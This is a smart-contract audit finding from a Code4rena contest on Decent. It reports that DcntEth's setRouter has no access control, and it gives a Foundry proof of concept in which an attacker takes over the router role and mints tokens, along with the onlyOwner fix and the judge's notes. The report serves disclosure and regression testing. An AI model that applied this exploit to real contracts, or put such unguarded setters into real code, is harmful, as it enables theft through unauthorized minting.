Decent - boredpukar's results

Decent enables one-click transactions using any token across chains.

General Information

Platform: Code4rena

Start Date: 19/01/2024

Pot Size: $36,500 USDC

Total HM: 9

Participants: 113

Period: 3 days

Judge: 0xsomeone

Id: 322

League: ETH


Researcher Performance

Rank: 100/113

Findings: 1

Award: $0.09

🌟 Selected for report: 0

🚀 Solo Findings: 0

Lines of code

https://github.com/decentxyz/decent-bridge/blob/7f90fd4489551b69c20d11eeecb17a3f564afb18/src/DcntEth.sol#L20

Vulnerability details

Impact

The setRouter function in DcntEth has no access control: any address can call it and overwrite router. Because the onlyRouter modifier trusts whatever address is stored there, an attacker who points router at an address they control gains every router-only privilege of the token (the judge's comment on this issue identifies the concrete impact as arbitrary mints of the token).

Proof of Concept

The contract uses several modifiers, such as onlyRouter and onlyOwner, to restrict access to sensitive functions.

However, setRouter carries no modifier at all, so any address can call it and set the router to an arbitrary value. This is a significant security risk; the function should be restricted to the contract owner or another trusted entity.

    /**
     * @param _router the decentEthRouter associated with this eth
     */
     // @audit - can be called and set by anyone.
    function setRouter(address _router) public {
        router = _router;
    }
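The following Foundry test is an added illustration, not code from the original report or from the Decent project. It uses a simplified stand-in for DcntEth: the contract names, the SimpleOwnable base and the router-gated mint function are assumptions (mint is chosen because the judge's comment on this issue names arbitrary mints as the concrete impact). The first test shows an unprivileged address becoming router and minting to itself through the unguarded setRouter shown above; the second shows that the onlyOwner version rejects the same call while the owner can still set the router.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

/// Minimal owner bookkeeping so the example has no dependency beyond forge-std.
/// Hypothetical; DcntEth's actual owner logic is not reproduced here.
abstract contract SimpleOwnable {
    address public owner;

    modifier onlyOwner() {
        require(msg.sender == owner, "not owner");
        _;
    }

    constructor() {
        owner = msg.sender;
    }
}

/// Simplified stand-in for a router-gated token (hypothetical).
/// Everything guarded by onlyRouter trusts whatever address is stored in `router`.
abstract contract RouterGatedToken is SimpleOwnable {
    address public router;
    mapping(address => uint256) public balanceOf;

    modifier onlyRouter() {
        require(msg.sender == router, "not router");
        _;
    }

    // Router-only privilege; name assumed for illustration.
    function mint(address to, uint256 amount) external onlyRouter {
        balanceOf[to] += amount;
    }
}

/// Same shape as the audited function: no modifier, anyone may set the router.
contract VulnerableToken is RouterGatedToken {
    function setRouter(address _router) public {
        router = _router;
    }
}

/// The recommended fix: only the owner may change the router.
contract FixedToken is RouterGatedToken {
    function setRouter(address _router) public onlyOwner {
        router = _router;
    }
}

contract SetRouterTest is Test {
    address internal attacker = makeAddr("attacker");

    // Exploit path: an arbitrary address makes itself router, then mints at will.
    function test_anyoneCanBecomeRouterAndMint() public {
        VulnerableToken token = new VulnerableToken(); // owner = this test contract

        vm.startPrank(attacker);
        token.setRouter(attacker);            // no access control
        token.mint(attacker, 1_000_000 ether); // now passes onlyRouter
        vm.stopPrank();

        assertEq(token.router(), attacker);
        assertEq(token.balanceOf(attacker), 1_000_000 ether);
    }

    // With onlyOwner the same call reverts for the attacker but still works for the owner.
    function test_fixRejectsNonOwner() public {
        FixedToken token = new FixedToken(); // owner = this test contract

        vm.prank(attacker);
        vm.expectRevert(bytes("not owner"));
        token.setRouter(attacker);

        token.setRouter(address(0xBEEF)); // owner call succeeds
        assertEq(token.router(), address(0xBEEF));
    }
}
```

Run with `forge test --match-contract SetRouterTest`. The second test is the regression check a practitioner would keep after applying the fix: it fails if the modifier is ever removed again.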

Tools Used

Manual Review

Recommended Mitigation Steps

Secure the setRouter function by adding proper access control (the contract already uses onlyOwner for other privileged functions) so that unauthorized addresses cannot modify the router.

    /**
     * @param _router the decentEthRouter associated with this eth
     */
     // @audit - can be called and set by anyone.
-    function setRouter(address _router) public {
+    function setRouter(address _router) public onlyOwner {
        router = _router;
    }
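Review bot: the `// @audit - can be called and set by anyone.` comment above the function is carried into the proposed fix unchanged; drop or reword it in the mitigation, since it describes the bug rather than the fixed behaviour. The `onlyOwner` modifier on the `+` line relies on DcntEth already providing it, which the report states it does for other functions, so no additional inheritance is needed; a `require(_router != address(0))` check would be a cheap addition in the same function.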

Assessed type

Access Control

#0 - c4-pre-sort

2024-01-24T22:41:36Z

raymondfam marked the issue as sufficient quality report

#1 - c4-pre-sort

2024-01-24T22:41:43Z

raymondfam marked the issue as duplicate of #14

#2 - alex-ppg

2024-02-03T13:15:21Z

Insufficient elaboration on the precise impact of the vulnerability (arbitrary mints of the token).

#3 - c4-judge

2024-02-03T13:15:24Z

alex-ppg marked the issue as partial-75
